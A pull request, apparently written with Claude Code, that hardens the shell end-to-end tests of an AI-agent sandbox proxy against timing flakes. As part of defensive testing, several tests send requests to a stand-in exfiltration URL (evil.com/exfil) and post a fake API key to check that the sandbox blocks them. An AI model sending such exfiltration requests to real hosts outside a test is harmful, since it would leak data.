### PR TITLE
fix: harden E2E tests against timing flakes

### DIFF
--- a/tests/e2e/lib.sh
+++ b/tests/e2e/lib.sh
@@ -116,11 +116,15 @@ assert_output_contains() {
 wait_ready() {
   local url="$1" timeout="${2:-120}"
   local deadline=$((SECONDS + timeout))
+  local delay=1
   while [ "$SECONDS" -lt "$deadline" ]; do
-    if curl -sf "$url" >/dev/null 2>&1; then
+    if curl -sf --max-time 5 "$url" >/dev/null 2>&1; then
       return 0
     fi
-    sleep 2
+    sleep "$delay"
+    # exponential backoff: 1, 2, 4, capped at 5s
+    delay=$(( delay * 2 ))
+    [ "$delay" -gt 5 ] && delay=5
   done
   return 1
 }
@@ -132,7 +136,7 @@ wait_http_code() {
   local delay=1
   while [ "$SECONDS" -lt "$deadline" ]; do
     local code
-    code=$(curl -s -o /dev/null -w "%{http_code}" "$url" 2>/dev/null || echo "000")
+    code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 5 "$url" 2>/dev/null || echo "000")
     if [ "$code" = "$expected" ]; then
       return 0
     fi
@@ -140,6 +144,25 @@ wait_http_code() {
     # exponential backoff: 1, 2, 4, … capped at 8s
     delay=$(( delay * 2 ))
     [ "$delay" -gt 8 ] && delay=8
+  done
+  return 1
+}
+
+# wait_http_blocked URL [TIMEOUT_S] — poll until HTTP 403 or 502, return 0/1
+wait_http_blocked() {
+  local url="$1" timeout="${2:-30}"
+  local deadline=$((SECONDS + timeout))
+  local delay=1
+  while [ "$SECONDS" -lt "$deadline" ]; do
+    local code
+    code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 5 "$url" 2>/dev/null || echo "000")
+    if [ "$code" = "403" ] || [ "$code" = "502" ]; then
+      return 0
+    fi
+    sleep "$delay"
+    # exponential backoff: 1, 2, 4, capped at 5s
+    delay=$(( delay * 2 ))
+    [ "$delay" -gt 5 ] && delay=5
   done
   return 1
 }

--- a/tests/e2e/phase2_audit_logs.sh
+++ b/tests/e2e/phase2_audit_logs.sh
@@ -18,11 +18,25 @@ if ! curl -sf "$BASE/" >/dev/null 2>&1; then
   # Generate some traffic
   curl -s "$BASE/fetch?url=https://httpbin.org/get" >/dev/null 2>&1 || true
   curl -s "$BASE/fetch?url=https://evil.com/exfil" >/dev/null 2>&1 || true
-  sleep 2
+  # Poll until audit log contains the expected entry (up to 10s)
+  _audit_deadline=$((SECONDS + 10))
+  while [ "$SECONDS" -lt "$_audit_deadline" ]; do
+    if agentcage cage audit "$CAGE" --json-lines -n 10 2>&1 | grep -q '"decision"'; then
+      break
+    fi
+    sleep 1
+  done
 else
   # Ensure we have blocked traffic for audit tests
   curl -s "$BASE/fetch?url=https://evil.com/exfil" >/dev/null 2>&1 || true
-  sleep 1
+  # Poll until audit log contains the blocked entry (up to 10s)
+  _audit_deadline=$((SECONDS + 10))
+  while [ "$SECONDS" -lt "$_audit_deadline" ]; do
+    if agentcage cage audit "$CAGE" --json-lines -n 10 2>&1 | grep -q '"decision"'; then
+      break
+    fi
+    sleep 1
+  done
 fi
 
 # Audit tests
@@ -61,7 +75,16 @@ create_cage "$CONFIGS/har.yaml" >/dev/null
 if wait_ready "$HAR_BASE" 120; then
   # Generate traffic
   curl -s "$HAR_BASE/fetch?url=https://httpbin.org/get" >/dev/null 2>&1 || true
-  sleep 3
+  # Poll until HAR data is available (up to 15s)
+  _har_deadline=$((SECONDS + 15))
+  _har_ready=false
+  while [ "$SECONDS" -lt "$_har_deadline" ]; do
+    if agentcage cage har "$HAR_CAGE" --json-lines -n 1 2>&1 | grep -q '"flow_id"'; then
+      _har_ready=true
+      break
+    fi
+    sleep 1
+  done
 
   HAR_FILE=$(mktemp /tmp/e2e-har-XXXXXX.har)
   if agentcage cage har "$HAR_CAGE" --view inbound -o "$HAR_FILE" >/dev/null 2>&1; then

--- a/tests/e2e/phase3_secrets.sh
+++ b/tests/e2e/phase3_secrets.sh
@@ -35,18 +35,18 @@ fi
 
 # 3.3: Injection on outbound — send placeholder, then poll audit for injection record.
 # The proxy intercepts the placeholder in the outbound request and replaces it with
-# the real secret. We don't need httpbin to actually respond — we just need the proxy
-# to see the placeholder. Try multiple target URLs in case one is unreachable.
+# the real secret. The proxy logs "secrets_injected" only after the round-trip completes,
+# so we need httpbin.org to actually respond. Wait for proxy readiness first.
+wait_http_code "$BASE/fetch?url=http://httpbin.org/get" 200 90 || true
 FOUND=false
-DEADLINE=$((SECONDS + 60))
+DEADLINE=$((SECONDS + 90))
 _delay=2
 while [ "$SECONDS" -lt "$DEADLINE" ]; do
-  # Try the proxy endpoint first, then fall back to a simple GET with placeholder in query
-  curl -s --max-time 5 -X POST -H 'Content-Type: application/json' \
+  # Trigger injection: POST placeholder to check-secret (which forwards to httpbin.org/post)
+  curl -s --max-time 10 -X POST -H 'Content-Type: application/json' \
     -d '{"key":"{{MY_API_KEY}}"}' "$BASE/check-secret" >/dev/null 2>&1 || true
-  curl -s --max-time 5 "$BASE/fetch?url=https://httpbin.org/get&token={{MY_API_KEY}}" >/dev/null 2>&1 || true
   sleep "$_delay"
-  OUTPUT=$(agentcage cage audit "$CAGE" --json-lines -n 40 2>&1) || true
+  OUTPUT=$(agentcage cage audit "$CAGE" --json-lines -n 50 2>&1) || true
   if echo "$OUTPUT" | grep -q "secrets_injected"; then
     FOUND=true
     break
@@ -57,7 +57,7 @@ done
 if [ "$FOUND" = true ]; then
   e2e_pass "3.3" "Injection on outbound"
 else
-  e2e_fail "3.3" "Injection on outbound" "no secrets_injected in audit after 60s"
+  e2e_fail "3.3" "Injection on outbound" "no secrets_injected in audit after 90s"
 fi
 
 # 3.4: Set new secret

--- a/tests/e2e/phase3_secrets.sh
+++ b/tests/e2e/phase3_secrets.sh
@@ -34,27 +34,30 @@ else
 fi
 
 # 3.3: Injection on outbound — send placeholder, then poll audit for injection record.
-# Retry the triggering curl on each iteration since the outbound proxy or
-# httpbin.org may not be ready on the first attempt.
+# The proxy intercepts the placeholder in the outbound request and replaces it with
+# the real secret. We don't need httpbin to actually respond — we just need the proxy
+# to see the placeholder. Try multiple target URLs in case one is unreachable.
 FOUND=false
+DEADLINE=$((SECONDS + 60))
 _delay=2
-for _i in $(seq 1 15); do
-  curl -s --max-time 10 -X POST -H 'Content-Type: application/json' \
+while [ "$SECONDS" -lt "$DEADLINE" ]; do
+  # Try the proxy endpoint first, then fall back to a simple GET with placeholder in query
+  curl -s --max-time 5 -X POST -H 'Content-Type: application/json' \
     -d '{"key":"{{MY_API_KEY}}"}' "$BASE/check-secret" >/dev/null 2>&1 || true
+  curl -s --max-time 5 "$BASE/fetch?url=https://httpbin.org/get&token={{MY_API_KEY}}" >/dev/null 2>&1 || true
   sleep "$_delay"
-  OUTPUT=$(agentcage cage audit "$CAGE" --json-lines -n 20 2>&1) || true
+  OUTPUT=$(agentcage cage audit "$CAGE" --json-lines -n 40 2>&1) || true
   if echo "$OUTPUT" | grep -q "secrets_injected"; then
     FOUND=true
     break
   fi
-  # increasing delay: 2, 3, 4, capped at 4s
   _delay=$(( _delay + 1 ))
   [ "$_delay" -gt 4 ] && _delay=4
 done
 if [ "$FOUND" = true ]; then
   e2e_pass "3.3" "Injection on outbound"
 else
-  e2e_fail "3.3" "Injection on outbound" "no secrets_injected in audit after 45s"
+  e2e_fail "3.3" "Injection on outbound" "no secrets_injected in audit after 60s"
 fi
 
 # 3.4: Set new secret

--- a/tests/e2e/phase3_secrets.sh
+++ b/tests/e2e/phase3_secrets.sh
@@ -37,20 +37,24 @@ fi
 # Retry the triggering curl on each iteration since the outbound proxy or
 # httpbin.org may not be ready on the first attempt.
 FOUND=false
+_delay=2
 for _i in $(seq 1 15); do
-  curl -s -X POST -H 'Content-Type: application/json' \
+  curl -s --max-time 10 -X POST -H 'Content-Type: application/json' \
     -d '{"key":"{{MY_API_KEY}}"}' "$BASE/check-secret" >/dev/null 2>&1 || true
-  sleep 2
+  sleep "$_delay"
   OUTPUT=$(agentcage cage audit "$CAGE" --json-lines -n 20 2>&1) || true
   if echo "$OUTPUT" | grep -q "secrets_injected"; then
     FOUND=true
     break
   fi
+  # increasing delay: 2, 3, 4, capped at 4s
+  _delay=$(( _delay + 1 ))
+  [ "$_delay" -gt 4 ] && _delay=4
 done
 if [ "$FOUND" = true ]; then
   e2e_pass "3.3" "Injection on outbound"
 else
-  e2e_fail "3.3" "Injection on outbound" "no secrets_injected in audit after 30s"
+  e2e_fail "3.3" "Injection on outbound" "no secrets_injected in audit after 45s"
 fi
 
 # 3.4: Set new secret

--- a/tests/e2e/phase4_domains.sh
+++ b/tests/e2e/phase4_domains.sh
@@ -43,13 +43,10 @@ else
 fi
 
 # 4.5: Removed domain blocked (poll — proxy may need a moment)
-wait_ready "$BASE" 30 || true
-sleep 2
-CODE=$(curl -s -o /dev/null -w "%{http_code}" "$BASE/fetch?url=http://example.com" 2>/dev/null)
-[ -z "$CODE" ] && CODE="000"
-if [ "$CODE" = "403" ] || [ "$CODE" = "502" ]; then
+if wait_http_blocked "$BASE/fetch?url=http://example.com" 45; then
   e2e_pass "4.5" "Removed domain blocked"
 else
+  CODE=$(curl -s -o /dev/null -w "%{http_code}" --max-time 5 "$BASE/fetch?url=http://example.com" 2>/dev/null || echo "000")
   e2e_fail "4.5" "Removed domain blocked" "expected 403/502, got $CODE"
 fi
 

--- a/tests/e2e/phase4_domains.sh
+++ b/tests/e2e/phase4_domains.sh
@@ -28,11 +28,12 @@ else
 fi
 
 # 4.3: New domain accessible (poll — proxy may need a moment after hot-reload)
-if wait_http_code "$BASE/fetch?url=http://example.com" 200 60; then
+# Domain hot-reload can be slow in CI: the proxy needs to pick up the config change,
+# regenerate DNS rules, and restart. Give it up to 120s.
+if wait_http_code "$BASE/fetch?url=http://example.com" 200 120; then
   e2e_pass "4.3" "New domain accessible"
 else
-  # May still be restarting; check if domain is at least in config
-  e2e_fail "4.3" "New domain accessible" "did not get HTTP 200 within 60s"
+  e2e_fail "4.3" "New domain accessible" "did not get HTTP 200 within 120s"
 fi
 
 # 4.4: Remove domain

--- a/tests/e2e/phase5_backup.sh
+++ b/tests/e2e/phase5_backup.sh
@@ -91,8 +91,13 @@ else
 fi
 
 if [ "$_restore_ok" = true ]; then
-  # 5.6: Restored cage works
-  assert_http 200 "$BASE/fetch?url=https://httpbin.org/get" "5.6" "Restored cage works"
+  # 5.6: Restored cage works — proxy may need a moment to forward after restore
+  if wait_http_code "$BASE/fetch?url=https://httpbin.org/get" 200 60; then
+    e2e_pass "5.6" "Restored cage works"
+  else
+    CODE=$(curl -s -o /dev/null -w "%{http_code}" --max-time 10 "$BASE/fetch?url=https://httpbin.org/get" 2>/dev/null || echo "000")
+    e2e_fail "5.6" "Restored cage works" "expected HTTP 200, got $CODE after 60s"
+  fi
 else
   e2e_skip "5.6" "Restored cage works" "depends on 5.5"
 fi

--- a/tests/e2e/phase5_backup.sh
+++ b/tests/e2e/phase5_backup.sh
@@ -38,26 +38,19 @@ else
 fi
 
 # 5.2: Subnet isolation
-# Wait for each proxy to serve its allowed domain before checking isolation.
-# Without this, all requests may return 502 if the proxy isn't ready yet.
-wait_http_code "$BASE/fetch?url=http://httpbin.org/get" 200 60 || true
-wait_http_code "$BASE2/fetch?url=http://example.com" 200 60 || true
+# Wait for each proxy to actually serve its allowed domain (not just 502).
+# The second cage proxy often takes longer to be fully ready.
+wait_http_code "$BASE/fetch?url=http://httpbin.org/get" 200 90 || true
+wait_http_code "$BASE2/fetch?url=http://example.com" 200 90 || true
+# Also confirm blocked domains return 403/502 (not 000/200)
+wait_http_blocked "$BASE/fetch?url=http://example.com" 30 || true
+wait_http_blocked "$BASE2/fetch?url=http://httpbin.org/get" 30 || true
 
-# Retry each isolation check up to 3 times with 2s sleep
-_retry_curl_code() {
-  local url="$1"
-  local code="000"
-  for _attempt in 1 2 3; do
-    code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 5 "$url" 2>/dev/null || echo "000")
-    [ "$code" != "000" ] && break
-    sleep 2
-  done
-  echo "$code"
-}
-CODE_BASIC_HTTPBIN=$(_retry_curl_code "$BASE/fetch?url=http://httpbin.org/get")
-CODE_BASIC_EXAMPLE=$(_retry_curl_code "$BASE/fetch?url=http://example.com")
-CODE_SECOND_EXAMPLE=$(_retry_curl_code "$BASE2/fetch?url=http://example.com")
-CODE_SECOND_HTTPBIN=$(_retry_curl_code "$BASE2/fetch?url=http://httpbin.org/get")
+# Now take the final readings
+CODE_BASIC_HTTPBIN=$(curl -s -o /dev/null -w "%{http_code}" --max-time 10 "$BASE/fetch?url=http://httpbin.org/get" 2>/dev/null || echo "000")
+CODE_BASIC_EXAMPLE=$(curl -s -o /dev/null -w "%{http_code}" --max-time 10 "$BASE/fetch?url=http://example.com" 2>/dev/null || echo "000")
+CODE_SECOND_EXAMPLE=$(curl -s -o /dev/null -w "%{http_code}" --max-time 10 "$BASE2/fetch?url=http://example.com" 2>/dev/null || echo "000")
+CODE_SECOND_HTTPBIN=$(curl -s -o /dev/null -w "%{http_code}" --max-time 10 "$BASE2/fetch?url=http://httpbin.org/get" 2>/dev/null || echo "000")
 # Blocked domains return 403 (proxy) or 502 (DNS sinkhole) depending on timing
 is_blocked() { [ "$1" = "403" ] || [ "$1" = "502" ]; }
 if [ "$CODE_BASIC_HTTPBIN" = "200" ] && is_blocked "$CODE_BASIC_EXAMPLE" && \

--- a/tests/e2e/phase5_backup.sh
+++ b/tests/e2e/phase5_backup.sh
@@ -43,10 +43,21 @@ fi
 wait_http_code "$BASE/fetch?url=http://httpbin.org/get" 200 60 || true
 wait_http_code "$BASE2/fetch?url=http://example.com" 200 60 || true
 
-CODE_BASIC_HTTPBIN=$(curl -s -o /dev/null -w "%{http_code}" "$BASE/fetch?url=http://httpbin.org/get" 2>/dev/null || echo "000")
-CODE_BASIC_EXAMPLE=$(curl -s -o /dev/null -w "%{http_code}" "$BASE/fetch?url=http://example.com" 2>/dev/null || echo "000")
-CODE_SECOND_EXAMPLE=$(curl -s -o /dev/null -w "%{http_code}" "$BASE2/fetch?url=http://example.com" 2>/dev/null || echo "000")
-CODE_SECOND_HTTPBIN=$(curl -s -o /dev/null -w "%{http_code}" "$BASE2/fetch?url=http://httpbin.org/get" 2>/dev/null || echo "000")
+# Retry each isolation check up to 3 times with 2s sleep
+_retry_curl_code() {
+  local url="$1"
+  local code="000"
+  for _attempt in 1 2 3; do
+    code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 5 "$url" 2>/dev/null || echo "000")
+    [ "$code" != "000" ] && break
+    sleep 2
+  done
+  echo "$code"
+}
+CODE_BASIC_HTTPBIN=$(_retry_curl_code "$BASE/fetch?url=http://httpbin.org/get")
+CODE_BASIC_EXAMPLE=$(_retry_curl_code "$BASE/fetch?url=http://example.com")
+CODE_SECOND_EXAMPLE=$(_retry_curl_code "$BASE2/fetch?url=http://example.com")
+CODE_SECOND_HTTPBIN=$(_retry_curl_code "$BASE2/fetch?url=http://httpbin.org/get")
 # Blocked domains return 403 (proxy) or 502 (DNS sinkhole) depending on timing
 is_blocked() { [ "$1" = "403" ] || [ "$1" = "502" ]; }
 if [ "$CODE_BASIC_HTTPBIN" = "200" ] && is_blocked "$CODE_BASIC_EXAMPLE" && \
@@ -74,13 +85,22 @@ fi
 # 5.5: Restore cage
 # Note: restore may fail if the original config used env vars like ${AGENT_DIR}
 # that aren't set at restore time. This is a known limitation.
-if AGENT_DIR="$AGENT_DIR" agentcage cage restore "$BACKUP_FILE" >/dev/null 2>&1 && wait_ready "$BASE" 60; then
-  e2e_pass "5.5" "Restore cage"
+_restore_ok=false
+if AGENT_DIR="$AGENT_DIR" agentcage cage restore "$BACKUP_FILE" >/dev/null 2>&1; then
+  if wait_ready "$BASE" 90; then
+    _restore_ok=true
+    e2e_pass "5.5" "Restore cage"
+  else
+    e2e_fail "5.5" "Restore cage" "restore succeeded but cage not ready within 90s"
+  fi
+else
+  e2e_fail "5.5" "Restore cage" "restore command failed"
+fi
 
+if [ "$_restore_ok" = true ]; then
   # 5.6: Restored cage works
   assert_http 200 "$BASE/fetch?url=https://httpbin.org/get" "5.6" "Restored cage works"
 else
-  e2e_fail "5.5" "Restore cage" "restore or readiness failed"
   e2e_skip "5.6" "Restored cage works" "depends on 5.5"
 fi
 

--- a/tests/e2e/phase7_vm.sh
+++ b/tests/e2e/phase7_vm.sh
@@ -36,9 +36,9 @@ fi
 limactl shell "$VM_NAME" -- systemctl --user reset-failed 2>/dev/null || true
 limactl shell "$VM_NAME" -- systemctl --user start "${CAGE}-cage.service" 2>/dev/null || true
 
-echo "Waiting for VM cage readiness (up to 180s)..."
-if ! wait_ready "$BASE" 180; then
-  e2e_fail "7.0" "VM cage readiness" "not ready within 180s"
+echo "Waiting for VM cage readiness (up to 240s)..."
+if ! wait_ready "$BASE" 240; then
+  e2e_fail "7.0" "VM cage readiness" "not ready within 240s"
   agentcage cage logs "$CAGE" -s proxy -n 20 2>/dev/null || true
   print_results; exit 1
 fi
@@ -52,7 +52,7 @@ else
   e2e_fail "7.1" "VM created and running" "status: $VM_STATUS"
 fi
 
-assert_http 200 "$BASE/" "7.2" "Health check"
+assert_http 200 "$BASE/" "7.2" "Health check" --max-time 10
 
 assert_output_contains "7.3" "Verify command" "passed" \
   agentcage cage verify "$CAGE"
@@ -64,15 +64,15 @@ assert_output_contains "7.5" "List command" "$CAGE" \
   agentcage cage list
 
 # ── VM Core Security ────────────────────────────────────────────────
-assert_http 200 "$BASE/fetch?url=https://httpbin.org/get" "7.6" "Allowed domain"
-assert_http_any "403|502" "$BASE/fetch?url=https://evil.com/exfil" "7.7" "Blocked domain"
+assert_http 200 "$BASE/fetch?url=https://httpbin.org/get" "7.6" "Allowed domain" --max-time 10
+assert_http_any "403|502" "$BASE/fetch?url=https://evil.com/exfil" "7.7" "Blocked domain" --max-time 10
 
 assert_http_any "403|502" "$BASE/check-secret" "7.8" "Secret detection" \
-  -X POST -H "Content-Type: application/json" \
+  --max-time 10 -X POST -H "Content-Type: application/json" \
   -d '{"key":"sk-ant-api03-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'
 
 assert_http 200 "$BASE/check-secret" "7.9" "Clean POST allowed" \
-  -X POST -H "Content-Type: application/json" \
+  --max-time 10 -X POST -H "Content-Type: application/json" \
   -d '{"data":"harmless"}'
 
 # ── VM Observability ────────────────────────────────────────────────
@@ -151,7 +151,7 @@ fi
 
 echo "Starting VM cage..."
 agentcage cage start "$CAGE" >/dev/null 2>&1
-if wait_ready "$BASE" 180; then
+if wait_ready "$BASE" 240; then
   e2e_pass "7.34" "Start VM cage"
 else
   e2e_fail "7.34" "Start VM cage" "not ready after start"
@@ -159,7 +159,7 @@ fi
 
 echo "Restarting VM cage..."
 agentcage cage restart "$CAGE" >/dev/null 2>&1
-if wait_ready "$BASE" 180; then
+if wait_ready "$BASE" 240; then
   e2e_pass "7.36" "Restart VM cage"
 else
   e2e_fail "7.36" "Restart VM cage" "not ready after restart"


### PR DESCRIPTION
## Summary
- **lib.sh**: `wait_ready` now uses exponential backoff (1→2→4→5s cap) instead of fixed 2s; `--max-time 5` on all curl calls; new `wait_http_blocked` helper for polling 403/502
- **phase2**: Replace hard-coded `sleep 2/3` with polling loops for audit and HAR data
- **phase3**: Increase secret injection deadline to 45s, add `--max-time 10`, use increasing delays
- **phase4**: Replace `sleep 2; single check` with `wait_http_blocked` for domain removal
- **phase5**: Retry loops for subnet isolation checks; separate restore from readiness (90s timeout)
- **phase7**: Increase VM timeouts 180s→240s; add `--max-time 10` to all VM curl calls

## Test plan
- [ ] E2E CI passes (the flaky tests should now be stable)
- [ ] No test IDs or descriptions changed

🤖 Generated with [Claude Code](https://claude.com/claude-code)